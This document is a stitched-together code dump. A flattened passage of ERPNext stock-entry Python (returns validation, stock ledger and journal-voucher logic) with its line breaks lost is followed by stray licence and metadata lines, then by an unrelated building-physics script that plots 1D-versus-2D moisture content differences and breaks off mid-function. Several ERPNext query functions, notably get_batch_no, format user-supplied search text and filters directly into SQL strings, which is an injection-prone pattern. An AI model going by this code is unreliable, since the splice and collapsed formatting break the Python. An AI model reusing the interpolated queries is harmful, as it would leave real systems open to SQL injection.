NotUpdateStockError) # posting date check ref_posting_datetime = "%s %s" % (cstr(ref.doc.posting_date), cstr(ref.doc.posting_time) or "00:00:00") this_posting_datetime = "%s %s" % (cstr(self.posting_date), cstr(self.posting_time)) if this_posting_datetime < ref_posting_datetime: from frappe.utils.dateutils import datetime_in_user_format frappe.throw(_("Posting timestamp must be after {0}").format(datetime_in_user_format(ref_posting_datetime))) stock_items = get_stock_items_for_return(ref.doc, ref.parentfields) already_returned_item_qty = self.get_already_returned_item_qty(ref.fieldname) for item in self.get("mtn_details"): # validate if item exists in the ref doc and that it is a stock item if item.item_code not in stock_items: frappe.throw(_("Item {0} does not exist in {1} {2}").format(item.item_code, ref.doc.doctype, ref.doc.name), frappe.DoesNotExistError) # validate quantity <= ref item's qty - qty already returned if self.purpose == "Purchase Return": ref_item_qty = sum([flt(d.qty)*flt(d.conversion_factor) for d in ref.doc.get({"item_code": item.item_code})]) elif self.purpose == "Sales Return": ref_item_qty = sum([flt(d.qty) for d in ref.doc.get({"item_code": item.item_code})]) returnable_qty = ref_item_qty - flt(already_returned_item_qty.get(item.item_code)) if not returnable_qty: frappe.throw(_("Item {0} has already been returned").format(item.item_code), StockOverReturnError) elif item.transfer_qty > returnable_qty: frappe.throw(_("Cannot return more than {0} for Item {1}").format(returnable_qty, item.item_code), StockOverReturnError) def get_already_returned_item_qty(self, ref_fieldname): return dict(frappe.db.sql("""select item_code, sum(transfer_qty) as qty from `tabStock Entry Detail` where parent in ( select name from `tabStock Entry` where `%s`=%s and docstatus=1) group by item_code""" % (ref_fieldname, "%s"), (self.get(ref_fieldname),))) def update_stock_ledger(self): sl_entries = [] for d in self.get('mtn_details'): if cstr(d.s_warehouse) and self.docstatus == 1: sl_entries.append(self.get_sl_entries(d, { "warehouse": cstr(d.s_warehouse), "actual_qty": -flt(d.transfer_qty), "incoming_rate": 0 })) if cstr(d.t_warehouse): sl_entries.append(self.get_sl_entries(d, { "warehouse": cstr(d.t_warehouse), "actual_qty": flt(d.transfer_qty), "incoming_rate": flt(d.incoming_rate) })) # On cancellation, make stock ledger entry for # target warehouse first, to update serial no values properly if cstr(d.s_warehouse) and self.docstatus == 2: sl_entries.append(self.get_sl_entries(d, { "warehouse": cstr(d.s_warehouse), "actual_qty": -flt(d.transfer_qty), "incoming_rate": 0 })) self.make_sl_entries(sl_entries, self.amended_from and 'Yes' or 'No') def update_production_order(self): def _validate_production_order(pro_doc): if flt(pro_doc.docstatus) != 1: frappe.throw(_("Production Order {0} must be submitted").format(self.production_order)) if pro_doc.status == 'Stopped': frappe.throw(_("Transaction not allowed against stopped Production Order {0}").format(self.production_order)) if self.production_order: pro_doc = frappe.get_doc("Production Order", self.production_order) _validate_production_order(pro_doc) pro_doc.run_method("update_status") if self.purpose == "Manufacture/Repack": pro_doc.run_method("update_produced_qty") self.update_planned_qty(pro_doc) def update_planned_qty(self, pro_doc): from erpnext.stock.utils import update_bin update_bin({ "item_code": pro_doc.production_item, "warehouse": pro_doc.fg_warehouse, "posting_date": self.posting_date, "planned_qty": (self.docstatus==1 and -1 or 1 ) * flt(self.fg_completed_qty) }) def get_item_details(self, args): item = frappe.db.sql("""select stock_uom, description, item_name, expense_account, buying_cost_center from `tabItem` where name = %s and (ifnull(end_of_life,'0000-00-00')='0000-00-00' or end_of_life > now())""", (args.get('item_code')), as_dict = 1) if not item: frappe.throw(_("Item {0} is not active or end of life has been reached").format(args.get("item_code"))) ret = { 'uom' : item and item[0]['stock_uom'] or '', 'stock_uom' : item and item[0]['stock_uom'] or '', 'description' : item and item[0]['description'] or '', 'item_name' : item and item[0]['item_name'] or '', 'expense_account' : args.get("expense_account") \ or frappe.db.get_value("Company", args.get("company"), "stock_adjustment_account"), 'cost_center' : item and item[0]['buying_cost_center'] or args.get("cost_center"), 'qty' : 0, 'transfer_qty' : 0, 'conversion_factor' : 1, 'batch_no' : '', 'actual_qty' : 0, 'incoming_rate' : 0 } stock_and_rate = args.get('warehouse') and self.get_warehouse_details(args) or {} ret.update(stock_and_rate) return ret def get_uom_details(self, args): conversion_factor = frappe.db.get_value("UOM Conversion Detail", {"parent": args.get("item_code"), "uom": args.get("uom")}, "conversion_factor") if not conversion_factor: frappe.msgprint(_("UOM coversion factor required for UOM: {0} in Item: {1}") .format(args.get("uom"), args.get("item_code"))) ret = {'uom' : ''} else: ret = { 'conversion_factor' : flt(conversion_factor), 'transfer_qty' : flt(args.get("qty")) * flt(conversion_factor) } return ret def get_warehouse_details(self, args): ret = {} if args.get('warehouse') and args.get('item_code'): args.update({ "posting_date": self.posting_date, "posting_time": self.posting_time, }) args = frappe._dict(args) ret = { "actual_qty" : get_previous_sle(args).get("qty_after_transaction") or 0, "incoming_rate" : self.get_incoming_rate(args) } return ret def get_items(self): self.set('mtn_details', []) pro_obj = None if self.production_order: # common validations pro_obj = frappe.get_doc('Production Order', self.production_order) if pro_obj: self.validate_production_order(pro_obj) self.bom_no = pro_obj.bom_no else: # invalid production order self.production_order = None if self.bom_no: if self.purpose in ["Material Issue", "Material Transfer", "Manufacture/Repack", "Subcontract"]: if self.production_order and self.purpose == "Material Transfer": item_dict = self.get_pending_raw_materials(pro_obj) else: if not self.fg_completed_qty: frappe.throw(_("Manufacturing Quantity is mandatory")) item_dict = self.get_bom_raw_materials(self.fg_completed_qty) for item in item_dict.values(): if pro_obj: item["from_warehouse"] = pro_obj.wip_warehouse item["to_warehouse"] = "" # add raw materials to Stock Entry Detail table self.add_to_stock_entry_detail(item_dict) # add finished good item to Stock Entry Detail table -- along with bom_no if self.production_order and self.purpose == "Manufacture/Repack": item = frappe.db.get_value("Item", pro_obj.production_item, ["item_name", "description", "stock_uom", "expense_account", "buying_cost_center"], as_dict=1) self.add_to_stock_entry_detail({ cstr(pro_obj.production_item): { "to_warehouse": pro_obj.fg_warehouse, "from_warehouse": "", "qty": self.fg_completed_qty, "item_name": item.item_name, "description": item.description, "stock_uom": item.stock_uom, "expense_account": item.expense_account, "cost_center": item.buying_cost_center, } }, bom_no=pro_obj.bom_no) elif self.purpose in ["Material Receipt", "Manufacture/Repack"]: if self.purpose=="Material Receipt": self.from_warehouse = "" item = frappe.db.sql("""select name, item_name, description, stock_uom, expense_account, buying_cost_center from `tabItem` where name=(select item from tabBOM where name=%s)""", self.bom_no, as_dict=1) self.add_to_stock_entry_detail({ item[0]["name"] : { "qty": self.fg_completed_qty, "item_name": item[0].item_name, "description": item[0]["description"], "stock_uom": item[0]["stock_uom"], "from_warehouse": "", "expense_account": item[0].expense_account, "cost_center": item[0].buying_cost_center, } }, bom_no=self.bom_no) self.get_stock_and_rate() def get_bom_raw_materials(self, qty): from erpnext.manufacturing.doctype.bom.bom import get_bom_items_as_dict # item dict = { item_code: {qty, description, stock_uom} } item_dict = get_bom_items_as_dict(self.bom_no, qty=qty, fetch_exploded = self.use_multi_level_bom) for item in item_dict.values(): item.from_warehouse = item.default_warehouse return item_dict def get_pending_raw_materials(self, pro_obj): """ issue (item quantity) that is pending to issue or desire to transfer, whichever is less """ item_dict = self.get_bom_raw_materials(1) issued_item_qty = self.get_issued_qty() max_qty = flt(pro_obj.qty) only_pending_fetched = [] for item in item_dict: pending_to_issue = (max_qty * item_dict[item]["qty"]) - issued_item_qty.get(item, 0) desire_to_transfer = flt(self.fg_completed_qty) * item_dict[item]["qty"] if desire_to_transfer <= pending_to_issue: item_dict[item]["qty"] = desire_to_transfer else: item_dict[item]["qty"] = pending_to_issue if pending_to_issue: only_pending_fetched.append(item) # delete items with 0 qty for item in item_dict.keys(): if not item_dict[item]["qty"]: del item_dict[item] # show some message if not len(item_dict): frappe.msgprint(_("""All items have already been transferred for this Production Order.""")) elif only_pending_fetched: frappe.msgprint(_("Pending Items {0} updated").format(only_pending_fetched)) return item_dict def get_issued_qty(self): issued_item_qty = {} result = frappe.db.sql("""select t1.item_code, sum(t1.qty) from `tabStock Entry Detail` t1, `tabStock Entry` t2 where t1.parent = t2.name and t2.production_order = %s and t2.docstatus = 1 and t2.purpose = 'Material Transfer' group by t1.item_code""", self.production_order) for t in result: issued_item_qty[t[0]] = flt(t[1]) return issued_item_qty def add_to_stock_entry_detail(self, item_dict, bom_no=None): expense_account, cost_center = frappe.db.get_values("Company", self.company, \ ["default_expense_account", "cost_center"])[0] for d in item_dict: se_child = self.append('mtn_details') se_child.s_warehouse = item_dict[d].get("from_warehouse", self.from_warehouse) se_child.t_warehouse = item_dict[d].get("to_warehouse", self.to_warehouse) se_child.item_code = cstr(d) se_child.item_name = item_dict[d]["item_name"] se_child.description = item_dict[d]["description"] se_child.uom = item_dict[d]["stock_uom"] se_child.stock_uom = item_dict[d]["stock_uom"] se_child.qty = flt(item_dict[d]["qty"]) se_child.expense_account = item_dict[d]["expense_account"] or expense_account se_child.cost_center = item_dict[d]["cost_center"] or cost_center # in stock uom se_child.transfer_qty = flt(item_dict[d]["qty"]) se_child.conversion_factor = 1.00 # to be assigned for finished item se_child.bom_no = bom_no def validate_with_material_request(self): for item in self.get("mtn_details"): if item.material_request: mreq_item = frappe.db.get_value("Material Request Item", {"name": item.material_request_item, "parent": item.material_request}, ["item_code", "warehouse", "idx"], as_dict=True) if mreq_item.item_code != item.item_code or mreq_item.warehouse != item.t_warehouse: frappe.throw(_("Item or Warehouse for row {0} does not match Material Request").format(item.idx), frappe.MappingMismatchError) def get_work_orderDetails(self, work_order): WO_details = frappe.db.get_value('Work Order', work_order, '*', as_dict=1, debug=1) if WO_details: return { 'sales_invoice_no' : WO_details.sales_invoice_no, 'customer_name' : WO_details.customer_name, 'trial_date' : WO_details.trial_date, 'delivery_date' : WO_details.delivery_date, 'trials' : WO_details.trial_no } else: return None @frappe.whitelist() def get_party_details(ref_dt, ref_dn): if ref_dt in ["Delivery Note", "Sales Invoice"]: res = frappe.db.get_value(ref_dt, ref_dn, ["customer", "customer_name", "address_display as customer_address"], as_dict=1) else: res = frappe.db.get_value(ref_dt, ref_dn, ["supplier", "supplier_name", "address_display as supplier_address"], as_dict=1) return res or {} @frappe.whitelist() def get_production_order_details(production_order): result = frappe.db.sql("""select bom_no, ifnull(qty, 0) - ifnull(produced_qty, 0) as fg_completed_qty, use_multi_level_bom, wip_warehouse from `tabProduction Order` where name = %s""", production_order, as_dict=1) return result and result[0] or {} def query_sales_return_doc(doctype, txt, searchfield, start, page_len, filters): conditions = "" if doctype == "Sales Invoice": conditions = "and update_stock=1" return frappe.db.sql("""select name, customer, customer_name from `tab%s` where docstatus = 1 and (`%s` like %%(txt)s or `customer` like %%(txt)s) %s %s order by name, customer, customer_name limit %s""" % (doctype, searchfield, conditions, get_match_cond(doctype), "%(start)s, %(page_len)s"), {"txt": "%%%s%%" % txt, "start": start, "page_len": page_len}, as_list=True) def query_purchase_return_doc(doctype, txt, searchfield, start, page_len, filters): return frappe.db.sql("""select name, supplier, supplier_name from `tab%s` where docstatus = 1 and (`%s` like %%(txt)s or `supplier` like %%(txt)s) %s order by name, supplier, supplier_name limit %s""" % (doctype, searchfield, get_match_cond(doctype), "%(start)s, %(page_len)s"), {"txt": "%%%s%%" % txt, "start": start, "page_len": page_len}, as_list=True) def query_return_item(doctype, txt, searchfield, start, page_len, filters): txt = txt.replace("%", "") ref = get_return_doc_and_details(filters) stock_items = get_stock_items_for_return(ref.doc, ref.parentfields) result = [] for item in ref.doc.get_all_children(): if getattr(item, "item_code", None) in stock_items: item.item_name = cstr(item.item_name) item.description = cstr(item.description) if (txt in item.item_code) or (txt in item.item_name) or (txt in item.description): val = [ item.item_code, (len(item.item_name) > 40) and (item.item_name[:40] + "...") or item.item_name, (len(item.description) > 40) and (item.description[:40] + "...") or \ item.description ] if val not in result: result.append(val) return result[start:start+page_len] def get_batch_no(doctype, txt, searchfield, start, page_len, filters): if not filters.get("posting_date"): filters["posting_date"] = nowdate() batch_nos = None args = { 'item_code': filters.get("item_code"), 's_warehouse': filters.get('s_warehouse'), 'posting_date': filters.get('posting_date'), 'txt': "%%%s%%" % txt, 'mcond':get_match_cond(doctype), "start": start, "page_len": page_len } if filters.get("s_warehouse"): batch_nos = frappe.db.sql("""select batch_no from `tabStock Ledger Entry` sle where item_code = '%(item_code)s' and warehouse = '%(s_warehouse)s' and batch_no like '%(txt)s' and exists(select * from `tabBatch` where name = sle.batch_no and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s or expiry_date = '') and docstatus != 2) %(mcond)s group by batch_no having sum(actual_qty) > 0 order by batch_no desc limit %(start)s, %(page_len)s """ % args) if batch_nos: return batch_nos else: return frappe.db.sql("""select name from `tabBatch` where item = '%(item_code)s' and docstatus < 2 and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s or expiry_date = '' or expiry_date = "0000-00-00") %(mcond)s order by name desc limit %(start)s, %(page_len)s """ % args) def get_stock_items_for_return(ref_doc, parentfields): """return item codes filtered from doc, which are stock items""" if isinstance(parentfields, basestring): parentfields = [parentfields] all_items = list(set([d.item_code for d in ref_doc.get_all_children() if d.get("item_code")])) stock_items = frappe.db.sql_list("""select name from `tabItem` where is_stock_item='Yes' and name in (%s)""" % (", ".join(["%s"] * len(all_items))), tuple(all_items)) return stock_items def get_return_doc_and_details(args): ref = frappe._dict() # get ref_doc if args.get("purpose") in return_map: for fieldname, val in return_map[args.get("purpose")].items(): if args.get(fieldname): ref.fieldname = fieldname ref.doc = frappe.get_doc(val[0], args.get(fieldname)) ref.parentfields = val[1] break return ref return_map = { "Sales Return": { # [Ref DocType, [Item tables' parentfields]] "delivery_note_no": ["Delivery Note", ["delivery_note_details", "packing_details"]], "sales_invoice_no": ["Sales Invoice", ["entries", "packing_details"]] }, "Purchase Return": { "purchase_receipt_no": ["Purchase Receipt", ["purchase_receipt_details"]] } } @frappe.whitelist() def make_return_jv(stock_entry): se = frappe.get_doc("Stock Entry", stock_entry) if not se.purpose in ["Sales Return", "Purchase Return"]: return ref = get_return_doc_and_details(se) if ref.doc.doctype == "Delivery Note": result = make_return_jv_from_delivery_note(se, ref) elif ref.doc.doctype == "Sales Invoice": result = make_return_jv_from_sales_invoice(se, ref) elif ref.doc.doctype == "Purchase Receipt": result = make_return_jv_from_purchase_receipt(se, ref) # create jv doc and fetch balance for each unique row item jv = frappe.new_doc("Journal Voucher") jv.update({ "posting_date": se.posting_date, "voucher_type": se.purpose == "Sales Return" and "Credit Note" or "Debit Note", "fiscal_year": se.fiscal_year, "company": se.company }) from erpnext.accounts.utils import get_balance_on for r in result: jv.append("entries", { "account": r.get("account"), "against_invoice": r.get("against_invoice"), "against_voucher": r.get("against_voucher"), "balance": get_balance_on(r.get("account"), se.posting_date) if r.get("account") else 0 }) return jv def make_return_jv_from_sales_invoice(se, ref): # customer account entry parent = { "account": ref.doc.debit_to, "against_invoice": ref.doc.name, } # income account entries children = [] for se_item in se.get("mtn_details"): # find item in ref.doc ref_item = ref.doc.get({"item_code": se_item.item_code})[0] account = get_sales_account_from_item(ref.doc, ref_item) if account not in children: children.append(account) return [parent] + [{"account": account} for account in children] def get_sales_account_from_item(doc, ref_item): account = None if not getattr(ref_item, "income_account", None): if ref_item.parent_item: parent_item = doc.get(doc.fname, {"item_code": ref_item.parent_item})[0] account = parent_item.income_account else: account = ref_item.income_account return account def make_return_jv_from_delivery_note(se, ref): invoices_against_delivery = get_invoice_list("Sales Invoice Item", "delivery_note", ref.doc.name) if not invoices_against_delivery: sales_orders_against_delivery = [d.against_sales_order for d in ref.doc.get_all_children() if getattr(d, "against_sales_order", None)] if sales_orders_against_delivery: invoices_against_delivery = get_invoice_list("Sales Invoice Item", "sales_order", sales_orders_against_delivery) if not invoices_against_delivery: return [] packing_item_parent_map = dict([[d.item_code, d.parent_item] for d in ref.doc.get(ref.parentfields[1])]) parent = {} children = [] for se_item in se.get("mtn_details"): for sales_invoice in invoices_against_delivery: si = frappe.get_doc("Sales Invoice", sales_invoice) if se_item.item_code in packing_item_parent_map: ref_item = si.get({"item_code": packing_item_parent_map[se_item.item_code]}) else: ref_item = si.get({"item_code": se_item.item_code}) if not ref_item: continue ref_item = ref_item[0] account = get_sales_account_from_item(si, ref_item) if account not in children: children.append(account) if not parent: parent = {"account": si.debit_to} break if len(invoices_against_delivery) == 1: parent["against_invoice"] = invoices_against_delivery[0] result = [parent] + [{"account": account} for account in children] return result def get_invoice_list(doctype, link_field, value): if isinstance(value, basestring): value = [value] return frappe.db.sql_list("""select distinct parent from `tab%s` where docstatus = 1 and `%s` in (%s)""" % (doctype, link_field, ", ".join(["%s"]*len(value))), tuple(value)) def make_return_jv_from_purchase_receipt(se, ref): invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_receipt", ref.doc.name) if not invoice_against_receipt: purchase_orders_against_receipt = [d.prevdoc_docname for d in ref.doc.get(ref.doc.fname, {"prevdoc_doctype": "Purchase Order"}) if getattr(d, "prevdoc_docname", None)] if purchase_orders_against_receipt: invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_order", purchase_orders_against_receipt) if not invoice_against_receipt: return [] parent = {} children = [] for se_item in se.get("mtn_details"): for purchase_invoice in invoice_against_receipt: pi = frappe.get_doc("Purchase Invoice", purchase_invoice) ref_item = pi.get({"item_code": se_item.item_code}) if not ref_item: continue ref_item = ref_item[0] account = ref_item.expense_account if account not in children: children.append(account) if not parent: parent = {"account": pi.credit_to} break if len(invoice_against_receipt) == 1: parent["against_voucher"] = invoice_against_receipt[0] result = [parent] + [{"account": account} for account in children] return result
agpl-3.0
3,160,072,189,511,768,600
35.210251
143
0.676546
false
thp44/delphin_6_automation
data_process/2d_1d/archieve/moisture_content_comparison.py
1
18274
__author__ = "Christian Kongsgaard" __license__ = 'MIT' # -------------------------------------------------------------------------------------------------------------------- # # IMPORTS # Modules import pandas as pd import matplotlib.pyplot as plt # RiBuild Modules # -------------------------------------------------------------------------------------------------------------------- # # RIBuild out_folder = r'C:\Users\ocni\PycharmProjects\delphin_6_automation\data_process\2d_1d\processed_data' graphic_folder = r'U:\RIBuild\2D_1D\Processed Results\4A' hdf_file = out_folder + '/relative_moisture_content.h5' # Open HDF # Uninsulated dresdenzp_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_uninsulated_4a') dresdenzd_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_uninsulated_4a') postdam_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_uninsulated_4a') dresdenzp_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_uninsulated_4a') dresdenzd_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_uninsulated_4a') postdam_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_uninsulated_4a') total_uninsulated_4a = pd.concat([dresdenzp_highratio_uninsulated_4a, dresdenzd_highratio_uninsulated_4a, postdam_highratio_uninsulated_4a, dresdenzp_lowratio_uninsulated_4a, dresdenzd_lowratio_uninsulated_4a, postdam_lowratio_uninsulated_4a]) # Insulated dresdenzp_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_insulated_4a') dresdenzd_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_insulated_4a') postdam_highratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_insulated_4a') dresdenzp_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_insulated_4a') dresdenzd_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_insulated_4a') postdam_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_insulated_4a') total_insulated_4a = pd.concat([dresdenzp_highratio_insulated_4a, dresdenzd_highratio_insulated_4a, postdam_highratio_insulated_4a, dresdenzp_lowratio_insulated_4a, dresdenzd_lowratio_insulated_4a, postdam_lowratio_insulated_4a]) def plots(plot, save=False): """ Creates box plots from all the wall scenarios """ if plot == 'uninsulated' or plot == 'all': plt.figure('dresdenzp_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_highratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzp_highratio_uninsulated_4a_moisture") plt.figure('dresdenzd_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_highratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzd_highratio_uninsulated_4a_moisture") plt.figure('postdam_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_highratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/postdam_highratio_uninsulated_4a_moisture") plt.figure('dresdenzp_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_lowratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_uninsulated_4a_moisture") plt.figure('dresdenzd_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_lowratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_uninsulated_4a_moisture") plt.figure('postdam_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_lowratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/postdam_lowratio_uninsulated_4a_moisture") plt.figure('total_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) total_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: All - Mortar: All - Insulation: None') if save: plt.savefig(f"{graphic_folder}/total_uninsulated_4a_moisture") if plot == 'insulated' or plot == 'all': plt.figure('dresdenzp_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_highratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzp_highratio_insulated_4a_moisture") plt.figure('dresdenzd_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_highratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzd_highratio_insulated_4a_moisture") plt.figure('postdam_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_highratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/postdam_highratio_insulated_4a_moisture") plt.figure('dresdenzp_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_lowratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_insulated_4a_moisture") plt.figure('dresdenzd_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_lowratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_insulated_4a_moisture") plt.figure('postdam_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_lowratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/postdam_lowratio_insulated_4a_moisture") plt.figure('total_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) total_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: All - Mortar: All - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/total_insulated_4a_moisture") plt.show() plots('all', False) def std3_ratio(print_=False, excel=False): """Computes ratio of outliers in the data sets. Outliers is here defined as data points deviating with more the 3 standard deviations from the mean.""" std3_uninsulated_ratio_ = uninsulated() std3_insulated_ratio_ = insulated() if print_: print('Uninsulated') print(std3_uninsulated_ratio_) print('') print('Insulated') print(std3_insulated_ratio_) if excel: writer = pd.ExcelWriter(f'{out_folder}/moisture_std_ratios.xlsx') std3_uninsulated_ratio_.to_excel(writer, 'Uninsulated') std3_insulated_ratio_.to_excel(writer, 'Insulated') writer.save() def uninsulated(): """Computes the outliers for the uninsulated cases""" outliers_total_uninsulated = (total_uninsulated_4a.shape[0] - total_uninsulated_4a.sub(total_uninsulated_4a.mean()) .div(total_uninsulated_4a.std()).abs().lt(3).sum()) / total_uninsulated_4a.shape[0] outliers_zd_high_uninsulated = (dresdenzd_highratio_uninsulated_4a.shape[0] - dresdenzd_highratio_uninsulated_4a.sub(dresdenzd_highratio_uninsulated_4a.mean()) .div(dresdenzd_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_highratio_uninsulated_4a.shape[0] outliers_zp_high_uninsulated = (dresdenzp_highratio_uninsulated_4a.shape[0] - dresdenzp_highratio_uninsulated_4a.sub(dresdenzp_highratio_uninsulated_4a.mean()) .div(dresdenzp_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_highratio_uninsulated_4a.shape[0] outliers_pd_high_uninsulated = (postdam_highratio_uninsulated_4a.shape[0] - postdam_highratio_uninsulated_4a.sub(postdam_highratio_uninsulated_4a.mean()) .div(postdam_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / postdam_highratio_uninsulated_4a.shape[0] outliers_zd_low_uninsulated = (dresdenzd_lowratio_uninsulated_4a.shape[0] - dresdenzd_lowratio_uninsulated_4a.sub(dresdenzd_lowratio_uninsulated_4a.mean()) .div(dresdenzd_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_lowratio_uninsulated_4a.shape[0] outliers_zp_low_uninsulated = (dresdenzp_lowratio_uninsulated_4a.shape[0] - dresdenzp_lowratio_uninsulated_4a.sub(dresdenzp_lowratio_uninsulated_4a.mean()) .div(dresdenzp_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_lowratio_uninsulated_4a.shape[0] outliers_pd_low_uninsulated = (postdam_lowratio_uninsulated_4a.shape[0] - postdam_lowratio_uninsulated_4a.sub(postdam_lowratio_uninsulated_4a.mean()) .div(postdam_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / postdam_lowratio_uninsulated_4a.shape[0] outliers_uninsulated_ratio_ = pd.concat([outliers_total_uninsulated, outliers_zd_high_uninsulated, outliers_zp_high_uninsulated, outliers_pd_high_uninsulated, outliers_zd_low_uninsulated, outliers_zp_low_uninsulated, outliers_pd_low_uninsulated], axis=1) outliers_uninsulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: None", "Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None", "Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None", "Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None", "Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None", "Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None", "Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None"] return outliers_uninsulated_ratio_ def insulated(): """Computes the outliers for the insulated cases""" outliers_total_insulated = (total_insulated_4a.shape[0] - total_insulated_4a.sub(total_insulated_4a.mean()) 